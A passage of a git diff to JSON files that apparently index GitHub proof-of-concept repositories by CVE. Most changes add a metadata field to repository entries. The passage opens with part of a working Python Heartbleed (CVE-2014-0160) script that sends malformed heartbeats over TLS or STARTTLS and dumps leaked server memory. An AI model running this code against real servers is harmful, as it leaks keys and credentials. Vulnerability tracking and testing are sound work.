':' + str(opts.port) + ' returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return hexdump(pay) if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return '' def bleed(targ, port): try: res = '' print print '##################################################################' print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls) for x in range(0, opts.num): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() s.settimeout(10) s.connect((targ, port)) # send starttls command if specified as an option or if common smtp\/pop3\/imap ports are used if (opts.starttls) or (port in {25, 587, 110, 143, 21}): stls = False atls = False # check if smtp supports starttls\/stls if port in {25, 587}: print 'SMTP Port... Checking for STARTTLS Capability...' check = s.recv(1024) s.send(\"EHLO someone.org\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"STLS\" in check: opts.starttls = True stls = True print \"STLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # check if pop3\/imap supports starttls\/stls elif port in {110, 143}: print 'POP3\/IMAP4 Port... Checking for STARTTLS Capability...' check = s.recv(1024) if port == 110: s.send(\"CAPA\\n\") if port == 143: s.send(\"CAPABILITY\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"STLS\" in check: opts.starttls = True stls = True print \"STLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # check if ftp supports auth tls\/starttls elif port in {21}: print 'FTP Port... Checking for AUTH TLS Capability...' check = s.recv(1024) s.send(\"FEAT\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"AUTH TLS\" in check: opts.starttls = True atls = True print \"AUTH TLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # send appropriate tls command if supported if opts.starttls: sys.stdout.flush() if stls: print 'Sending STLS Command...' s.send(\"STLS\\n\") elif atls: print 'Sending AUTH TLS Command...' s.send(\"AUTH TLS\\n\") else: print 'Sending STARTTLS Command...' s.send(\"STARTTLS\\n\") if opts.verbose: print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if opts.verbose: print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' print '##################################################################' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) res += hit_hb(s, targ) s.close() print '##################################################################' print return res except: print \"Error connecting to host: \", sys.exc_info()[0] print '##################################################################' print def main(): allresults = '' # if a file is specified, loop through file if opts.filein: fileIN = open(opts.filein, \"r\") for line in fileIN: targetinfo = line.strip().split(\":\") if len(targetinfo) > 1: allresults = bleed(targetinfo[0], int(targetinfo[1])) else: allresults = bleed(targetinfo[0], opts.port) if allresults: print '%s' % (allresults) fileIN.close() else: if len(args) < 1: options.print_help() return allresults = bleed(args[0], opts.port) if allresults: print '%s' % (allresults) print if __name__ == '__main__': main()", @@ -1126,7 +1163,8 @@ "login": "iSCInc", "id": 6920447, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6920447?v=4", - "html_url": "https:\/\/github.com\/iSCInc" + "html_url": "https:\/\/github.com\/iSCInc", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/iSCInc\/heartbleed", "description": "A checker (site and tool) for CVE-2014-0160. Software from @FiloSottile for iSC Inc..", @@ -1156,7 +1194,8 @@ "login": "marstornado", "id": 1574834, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1574834?v=4", - "html_url": "https:\/\/github.com\/marstornado" + "html_url": "https:\/\/github.com\/marstornado", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/marstornado\/cve-2014-0160-Yunfeng-Jiang", "description": null, @@ -1186,7 +1225,8 @@ "login": "hmlio", "id": 11684719, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11684719?v=4", - "html_url": "https:\/\/github.com\/hmlio" + "html_url": "https:\/\/github.com\/hmlio", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hmlio\/vaas-cve-2014-0160", "description": "Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed", @@ -1216,7 +1256,8 @@ "login": "hybridus", "id": 5206389, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5206389?v=4", - "html_url": "https:\/\/github.com\/hybridus" + "html_url": "https:\/\/github.com\/hybridus", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hybridus\/heartbleedscanner", "description": "Network Scanner for OpenSSL Memory Leak (CVE-2014-0160) ", @@ -1246,7 +1287,8 @@ "login": "froyo75", "id": 8553697, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8553697?v=4", - "html_url": "https:\/\/github.com\/froyo75" + "html_url": "https:\/\/github.com\/froyo75", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/froyo75\/Heartbleed_Dockerfile_with_Nginx", "description": "Dockerfile for testing CVE-2014-0160 Heartbleed exploitation.", @@ -1276,7 +1318,8 @@ "login": "Xyl2k", "id": 8536299, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8536299?v=4", - "html_url": "https:\/\/github.com\/Xyl2k" + "html_url": "https:\/\/github.com\/Xyl2k", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Xyl2k\/CVE-2014-0160-Chrome-Plugin", "description": "Heartbleed", @@ -1306,7 +1349,8 @@ "login": "caiqiqi", "id": 8278315, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8278315?v=4", - "html_url": "https:\/\/github.com\/caiqiqi" + "html_url": "https:\/\/github.com\/caiqiqi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/caiqiqi\/OpenSSL-HeartBleed-CVE-2014-0160-PoC", "description": "来自:https:\/\/www.freebuf.com\/articles\/web\/31700.html", @@ -1336,7 +1380,8 @@ "login": "Saymeis", "id": 42687972, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42687972?v=4", - "html_url": "https:\/\/github.com\/Saymeis" + "html_url": "https:\/\/github.com\/Saymeis", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Saymeis\/HeartBleed", "description": "CVE-2014-0160", @@ -1366,7 +1411,8 @@ "login": "cved-sources", "id": 46423677, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", - "html_url": "https:\/\/github.com\/cved-sources" + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cved-sources\/cve-2014-0160", "description": "cve-2014-0160", @@ -1396,7 +1442,8 @@ "login": "cheese-hub", "id": 41589726, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41589726?v=4", - "html_url": "https:\/\/github.com\/cheese-hub" + "html_url": "https:\/\/github.com\/cheese-hub", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cheese-hub\/heartbleed", "description": "Demonstration of the Heartbleed Bug CVE-2014-0160", @@ -1426,7 +1473,8 @@ "login": "artofscripting-zz", "id": 1545672, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1545672?v=4", - "html_url": "https:\/\/github.com\/artofscripting-zz" + "html_url": "https:\/\/github.com\/artofscripting-zz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/artofscripting-zz\/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS", "description": null, @@ -1456,7 +1504,8 @@ "login": "cldme", "id": 10621824, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10621824?v=4", - "html_url": "https:\/\/github.com\/cldme" + "html_url": "https:\/\/github.com\/cldme", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cldme\/heartbleed-bug", "description": "Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔", @@ -1486,7 +1535,8 @@ "login": "ThanHuuTuan", "id": 32167814, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32167814?v=4", - "html_url": "https:\/\/github.com\/ThanHuuTuan" + "html_url": "https:\/\/github.com\/ThanHuuTuan", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ThanHuuTuan\/Heartexploit", "description": "Aquí está mi nuevo y primer exploit web, este exploit ataca a la vulnerabilidad de HeartBleed (CVE-2014-0160) espero que os guste.", @@ -1516,7 +1566,8 @@ "login": "rouze-d", "id": 50823809, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50823809?v=4", - "html_url": "https:\/\/github.com\/rouze-d" + "html_url": "https:\/\/github.com\/rouze-d", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rouze-d\/heartbleed", "description": "Simple OpenSSL TLS Heartbeat (CVE-2014-0160) Scanner and Exploit (Multiple SSL\/TLS versions)", @@ -1546,7 +1597,8 @@ "login": "WildfootW", "id": 11520473, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11520473?v=4", - "html_url": "https:\/\/github.com\/WildfootW" + "html_url": "https:\/\/github.com\/WildfootW", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/WildfootW\/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed", "description": null, @@ -1576,7 +1628,8 @@ "login": "GuillermoEscobero", "id": 15904345, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15904345?v=4", - "html_url": "https:\/\/github.com\/GuillermoEscobero" + "html_url": "https:\/\/github.com\/GuillermoEscobero", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GuillermoEscobero\/heartbleed", "description": "CVE-2014-0160 OpenSSL Heartbleed Proof of Concept", @@ -1606,7 +1659,8 @@ "login": "anthophilee", "id": 75995332, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75995332?v=4", - "html_url": "https:\/\/github.com\/anthophilee" + "html_url": "https:\/\/github.com\/anthophilee", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/anthophilee\/A2SV--SSL-VUL-Scan", "description": "A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https:\/\/github.com\/hahwul\/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device", @@ -1636,7 +1690,8 @@ "login": "ingochris", "id": 2686679, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2686679?v=4", - "html_url": "https:\/\/github.com\/ingochris" + "html_url": "https:\/\/github.com\/ingochris", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ingochris\/heartpatch.us", "description": "OpenSSL Heartbleed Bug CVE-2014-0160 Toolkit. Built with ❤ by Christopher Ngo.", @@ -1671,7 +1726,8 @@ "login": "belmind", "id": 22224799, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22224799?v=4", - "html_url": "https:\/\/github.com\/belmind" + "html_url": "https:\/\/github.com\/belmind", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/belmind\/heartbleed", "description": "A collection of scripts and instructions to test CVE-2014-0160 (heartbleed). ❤️ 🩸", @@ -1703,7 +1759,8 @@ "login": "pierceoneill", "id": 37594104, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37594104?v=4", - "html_url": "https:\/\/github.com\/pierceoneill" + "html_url": "https:\/\/github.com\/pierceoneill", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pierceoneill\/bleeding-heart", "description": "The Heartbleed bug `CVE-2014-0160` is a severe implementation flaw in the OpenSSL library, which enables attackers to steal data from the memory of the victim server. The contents of the stolen data depend on what is there in the memory of the server. It could potentially contain private keys, TLS session keys, usernames, passwords, credit cards, etc. The vulnerability is in the implementation of the Heartbeat protocol, which is used by SSL\/TLS to keep the connection alive.", @@ -1733,7 +1790,8 @@ "login": "NyxByt3", "id": 66146701, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", - "html_url": "https:\/\/github.com\/NyxByt3" + "html_url": "https:\/\/github.com\/NyxByt3", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NyxByt3\/CVE-2014-0160_Heartbleed", "description": null, @@ -1763,7 +1821,8 @@ "login": "GardeniaWhite", "id": 50975594, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50975594?v=4", - "html_url": "https:\/\/github.com\/GardeniaWhite" + "html_url": "https:\/\/github.com\/GardeniaWhite", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GardeniaWhite\/fuzzing", "description": "fuzzing with libFuzzer,inlude openssl heartbleed (CVE-2014-0160)", @@ -1793,7 +1852,8 @@ "login": "undacmic", "id": 46650582, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46650582?v=4", - "html_url": "https:\/\/github.com\/undacmic" + "html_url": "https:\/\/github.com\/undacmic", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/undacmic\/heartbleed-proof-of-concept", "description": "Proof of concept for exploiting the Heartbeat Extension bug detailed in the CVE-2014-0160. :old_key: :unlock:", @@ -1831,7 +1891,8 @@ "login": "cbk914", "id": 2042196, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2042196?v=4", - "html_url": "https:\/\/github.com\/cbk914" + "html_url": "https:\/\/github.com\/cbk914", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cbk914\/heartbleed-checker", "description": "Check for CVE-2014-0160 ", @@ -1861,7 +1922,8 @@ "login": "MrE-Fog", "id": 114317320, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114317320?v=4", - "html_url": "https:\/\/github.com\/MrE-Fog" + "html_url": "https:\/\/github.com\/MrE-Fog", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MrE-Fog\/CVE-2014-0160-Chrome-Plugin", "description": null, @@ -1891,7 +1953,8 @@ "login": "timsonner", "id": 66705347, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66705347?v=4", - "html_url": "https:\/\/github.com\/timsonner" + "html_url": "https:\/\/github.com\/timsonner", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/timsonner\/cve-2014-0160-heartbleed", "description": null, @@ -1921,7 +1984,8 @@ "login": "Yash-Thakkar77", "id": 117845673, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117845673?v=4", - "html_url": "https:\/\/github.com\/Yash-Thakkar77" + "html_url": "https:\/\/github.com\/Yash-Thakkar77", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Yash-Thakkar77\/CVE-2014-0160-HeartBleed", "description": null, diff --git a/2014/CVE-2014-0166.json b/2014/CVE-2014-0166.json index 3561620e41..47e869cb0a 100644 --- a/2014/CVE-2014-0166.json +++ b/2014/CVE-2014-0166.json @@ -7,7 +7,8 @@ "login": "Ettack", "id": 4652366, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4652366?v=4", - "html_url": "https:\/\/github.com\/Ettack" + "html_url": "https:\/\/github.com\/Ettack", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Ettack\/POC-CVE-2014-0166", "description": "POC of CVE-2014-0166 (WordPress cookie forgery vulnerability)", diff --git a/2014/CVE-2014-0195.json b/2014/CVE-2014-0195.json index 4f7b73b71c..cf882d3dd7 100644 --- a/2014/CVE-2014-0195.json +++ b/2014/CVE-2014-0195.json @@ -7,7 +7,8 @@ "login": "ricedu", "id": 7359760, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7359760?v=4", - "html_url": "https:\/\/github.com\/ricedu" + "html_url": "https:\/\/github.com\/ricedu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ricedu\/CVE-2014-0195", "description": "OpenSSL heap overflow PoC (CVE-2014-0195)", diff --git a/2014/CVE-2014-0196.json b/2014/CVE-2014-0196.json index ba24ebc7ea..6031ba060f 100644 --- a/2014/CVE-2014-0196.json +++ b/2014/CVE-2014-0196.json @@ -7,7 +7,8 @@ "login": "SunRain", "id": 864544, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/864544?v=4", - "html_url": "https:\/\/github.com\/SunRain" + "html_url": "https:\/\/github.com\/SunRain", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/SunRain\/CVE-2014-0196", "description": null, @@ -37,7 +38,8 @@ "login": "tempbottle", "id": 1203820, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1203820?v=4", - "html_url": "https:\/\/github.com\/tempbottle" + "html_url": "https:\/\/github.com\/tempbottle", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tempbottle\/CVE-2014-0196", "description": "CVE-2014-0196: Linux kernel pty layer race condition memory corruption", diff --git a/2014/CVE-2014-0224.json b/2014/CVE-2014-0224.json index 51b9f95b45..dd9884f8fa 100644 --- a/2014/CVE-2014-0224.json +++ b/2014/CVE-2014-0224.json @@ -7,7 +7,8 @@ "login": "Tripwire", "id": 4419286, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4419286?v=4", - "html_url": "https:\/\/github.com\/Tripwire" + "html_url": "https:\/\/github.com\/Tripwire", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Tripwire\/OpenSSL-CCS-Inject-Test", "description": "This script is designed for detection of vulnerable servers (CVE-2014-0224.) in a wide range of configurations. It attempts to negotiate using each affected protocol version (SSLv3, TLSv1, TLSv1.1, and TLSv1.2) advertising a comprehensive set of ciphers.", @@ -37,7 +38,8 @@ "login": "iph0n3", "id": 1528152, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1528152?v=4", - "html_url": "https:\/\/github.com\/iph0n3" + "html_url": "https:\/\/github.com\/iph0n3", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/iph0n3\/CVE-2014-0224", "description": null, @@ -67,7 +69,8 @@ "login": "droptables", "id": 5084547, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5084547?v=4", - "html_url": "https:\/\/github.com\/droptables" + "html_url": "https:\/\/github.com\/droptables", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/droptables\/ccs-eval", "description": "Used for evaluating hosts for CVE-2014-0224", @@ -97,7 +100,8 @@ "login": "ssllabs", "id": 1774628, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1774628?v=4", - "html_url": "https:\/\/github.com\/ssllabs" + "html_url": "https:\/\/github.com\/ssllabs", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ssllabs\/openssl-ccs-cve-2014-0224", "description": null, @@ -127,7 +131,8 @@ "login": "secretnonempty", "id": 1168808, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1168808?v=4", - "html_url": "https:\/\/github.com\/secretnonempty" + "html_url": "https:\/\/github.com\/secretnonempty", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/secretnonempty\/CVE-2014-0224", "description": null, diff --git a/2014/CVE-2014-0226.json b/2014/CVE-2014-0226.json index 9b2b88e486..68880a23dc 100644 --- a/2014/CVE-2014-0226.json +++ b/2014/CVE-2014-0226.json @@ -7,7 +7,8 @@ "login": "shreesh1", "id": 13206227, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13206227?v=4", - "html_url": "https:\/\/github.com\/shreesh1" + "html_url": "https:\/\/github.com\/shreesh1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/shreesh1\/CVE-2014-0226-poc", "description": null, diff --git a/2014/CVE-2014-0282.json b/2014/CVE-2014-0282.json index c898d30feb..b21b6fa37e 100644 --- a/2014/CVE-2014-0282.json +++ b/2014/CVE-2014-0282.json @@ -7,7 +7,8 @@ "login": "Charmve", "id": 29084184, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29084184?v=4", - "html_url": "https:\/\/github.com\/Charmve" + "html_url": "https:\/\/github.com\/Charmve", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Charmve\/PyStegosploit", "description": "PoC - Exploit Delivery via Steganography and Polyglots, CVE-2014-0282", diff --git a/2014/CVE-2014-0291.json b/2014/CVE-2014-0291.json index 81a474be46..e174d67557 100644 --- a/2014/CVE-2014-0291.json +++ b/2014/CVE-2014-0291.json @@ -7,7 +7,8 @@ "login": "niccoX", "id": 10669660, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10669660?v=4", - "html_url": "https:\/\/github.com\/niccoX" + "html_url": "https:\/\/github.com\/niccoX", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/niccoX\/patch-openssl-CVE-2014-0291_CVE-2015-0204", "description": null, diff --git a/2014/CVE-2014-0472.json b/2014/CVE-2014-0472.json index 476c1c8b62..99001da909 100644 --- a/2014/CVE-2014-0472.json +++ b/2014/CVE-2014-0472.json @@ -7,7 +7,8 @@ "login": "christasa", "id": 35037256, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35037256?v=4", - "html_url": "https:\/\/github.com\/christasa" + "html_url": "https:\/\/github.com\/christasa", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/christasa\/CVE-2014-0472", "description": "CVE-2014-0472 Django unexpected code execution using reverse()", diff --git a/2014/CVE-2014-0521.json b/2014/CVE-2014-0521.json index 6d1064b545..cdb9e1b4cd 100644 --- a/2014/CVE-2014-0521.json +++ b/2014/CVE-2014-0521.json @@ -7,7 +7,8 @@ "login": "molnarg", "id": 894421, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/894421?v=4", - "html_url": "https:\/\/github.com\/molnarg" + "html_url": "https:\/\/github.com\/molnarg", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/molnarg\/cve-2014-0521", "description": null, diff --git a/2014/CVE-2014-0816.json b/2014/CVE-2014-0816.json index 859cefc0a8..c02cf79f59 100644 --- a/2014/CVE-2014-0816.json +++ b/2014/CVE-2014-0816.json @@ -7,7 +7,8 @@ "login": "tandasat", "id": 1620923, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1620923?v=4", - "html_url": "https:\/\/github.com\/tandasat" + "html_url": "https:\/\/github.com\/tandasat", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tandasat\/CVE-2014-0816", "description": "CVE-2014-0816", diff --git a/2014/CVE-2014-0993.json b/2014/CVE-2014-0993.json index f8cd2f03b2..4317a0b42c 100644 --- a/2014/CVE-2014-0993.json +++ b/2014/CVE-2014-0993.json @@ -7,7 +7,8 @@ "login": "helpsystems", "id": 49566054, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49566054?v=4", - "html_url": "https:\/\/github.com\/helpsystems" + "html_url": "https:\/\/github.com\/helpsystems", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/helpsystems\/Embarcadero-Workaround", "description": "This is a workaround for CVE-2014-0993 and CVE-2014-0994 that patches on memory without the need to recompile your vulnerable software. This is not the Embarcadero official fix, this is only CORE Security workaround.", diff --git a/2014/CVE-2014-10069.json b/2014/CVE-2014-10069.json index 4947c2a9e0..3f345ce3f7 100644 --- a/2014/CVE-2014-10069.json +++ b/2014/CVE-2014-10069.json @@ -7,7 +7,8 @@ "login": "aimoda", "id": 96030190, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96030190?v=4", - "html_url": "https:\/\/github.com\/aimoda" + "html_url": "https:\/\/github.com\/aimoda", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/aimoda\/hitron-cfg-decrypter", "description": "CVE-2014-10069", diff --git a/2014/CVE-2014-1266.json b/2014/CVE-2014-1266.json index 2c8d0de1d1..59cce076c0 100644 --- a/2014/CVE-2014-1266.json +++ b/2014/CVE-2014-1266.json @@ -7,7 +7,8 @@ "login": "landonf", "id": 18884, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18884?v=4", - "html_url": "https:\/\/github.com\/landonf" + "html_url": "https:\/\/github.com\/landonf", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/landonf\/Testability-CVE-2014-1266", "description": "Demonstrating that SSLVerifySignedServerKeyExchange() is trivially testable.", @@ -37,7 +38,8 @@ "login": "linusyang", "id": 1445849, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1445849?v=4", - "html_url": "https:\/\/github.com\/linusyang" + "html_url": "https:\/\/github.com\/linusyang", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/linusyang\/SSLPatch", "description": "Patch iOS SSL vulnerability (CVE-2014-1266)", @@ -67,7 +69,8 @@ "login": "gabrielg", "id": 3902, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3902?v=4", - "html_url": "https:\/\/github.com\/gabrielg" + "html_url": "https:\/\/github.com\/gabrielg", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gabrielg\/CVE-2014-1266-poc", "description": "Apple OS X\/iOS SSL flaw demonstration", @@ -97,7 +100,8 @@ "login": "meetlight942", "id": 175837616, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/175837616?v=4", - "html_url": "https:\/\/github.com\/meetlight942" + "html_url": "https:\/\/github.com\/meetlight942", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/meetlight942\/PentesterLab-Intercept-CVE-2014-1266", "description": null, diff --git a/2014/CVE-2014-1303.json b/2014/CVE-2014-1303.json index 9ea8bdbdb1..c16f9efd86 100644 --- a/2014/CVE-2014-1303.json +++ b/2014/CVE-2014-1303.json @@ -7,7 +7,8 @@ "login": "RKX1209", "id": 964758, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/964758?v=4", - "html_url": "https:\/\/github.com\/RKX1209" + "html_url": "https:\/\/github.com\/RKX1209", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/RKX1209\/CVE-2014-1303", "description": "CVE-2014-1303 (WebKit Heap based BOF) proof of concept for Linux", diff --git a/2014/CVE-2014-1322.json b/2014/CVE-2014-1322.json index f7c5dab201..85b3f64e82 100644 --- a/2014/CVE-2014-1322.json +++ b/2014/CVE-2014-1322.json @@ -7,7 +7,8 @@ "login": "raymondpittman", "id": 6395348, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6395348?v=4", - "html_url": "https:\/\/github.com\/raymondpittman" + "html_url": "https:\/\/github.com\/raymondpittman", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/raymondpittman\/IPC-Memory-Mac-OSX-Exploit", "description": "CVE-2014-1322 - IPC Local Security Bypass | Mac OSX (Affected. >= 10.9.2)", diff --git a/2014/CVE-2014-1447.json b/2014/CVE-2014-1447.json index da97adf4f8..1eef802573 100644 --- a/2014/CVE-2014-1447.json +++ b/2014/CVE-2014-1447.json @@ -7,7 +7,8 @@ "login": "tagatac", "id": 1304425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1304425?v=4", - "html_url": "https:\/\/github.com\/tagatac" + "html_url": "https:\/\/github.com\/tagatac", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tagatac\/libvirt-CVE-2014-1447", "description": "Libvirt - Unauthenticated DoS Vulnerability (Exploit & Time Randomization to Thwart It)", diff --git a/2014/CVE-2014-160.json b/2014/CVE-2014-160.json index 4e14c44d95..23ecaa015c 100644 --- a/2014/CVE-2014-160.json +++ b/2014/CVE-2014-160.json @@ -7,7 +7,8 @@ "login": "menrcom", "id": 945008, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/945008?v=4", - "html_url": "https:\/\/github.com\/menrcom" + "html_url": "https:\/\/github.com\/menrcom", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/menrcom\/CVE-2014-160", "description": "CVE-2014-160 exploit", @@ -37,7 +38,8 @@ "login": "GitMirar", "id": 7244383, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7244383?v=4", - "html_url": "https:\/\/github.com\/GitMirar" + "html_url": "https:\/\/github.com\/GitMirar", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GitMirar\/heartbleed_exploit", "description": "Exploit for CVE-2014-160 (heartbleed) with required patch for libopenssl", diff --git a/2014/CVE-2014-1677.json b/2014/CVE-2014-1677.json index 8aae78528c..70c7d33f0c 100644 --- a/2014/CVE-2014-1677.json +++ b/2014/CVE-2014-1677.json @@ -7,7 +7,8 @@ "login": "tihmstar", "id": 1363935, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1363935?v=4", - "html_url": "https:\/\/github.com\/tihmstar" + "html_url": "https:\/\/github.com\/tihmstar", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tihmstar\/freePW_tc7200Eploit", "description": "Technicolor TC7200 - Credentials Disclosure CVE : CVE-2014-1677", diff --git a/2014/CVE-2014-1767.json b/2014/CVE-2014-1767.json index 74f39922fa..a4ac9bd2ec 100644 --- a/2014/CVE-2014-1767.json +++ b/2014/CVE-2014-1767.json @@ -7,7 +7,8 @@ "login": "ExploitCN", "id": 98264245, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98264245?v=4", - "html_url": "https:\/\/github.com\/ExploitCN" + "html_url": "https:\/\/github.com\/ExploitCN", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ExploitCN\/CVE-2014-1767-EXP-PAPER", "description": "CVE-2014-1767在win7_x64平台的EXP和分析文章", diff --git a/2014/CVE-2014-1773.json b/2014/CVE-2014-1773.json index 6b9e628ca8..f847c13a7b 100644 --- a/2014/CVE-2014-1773.json +++ 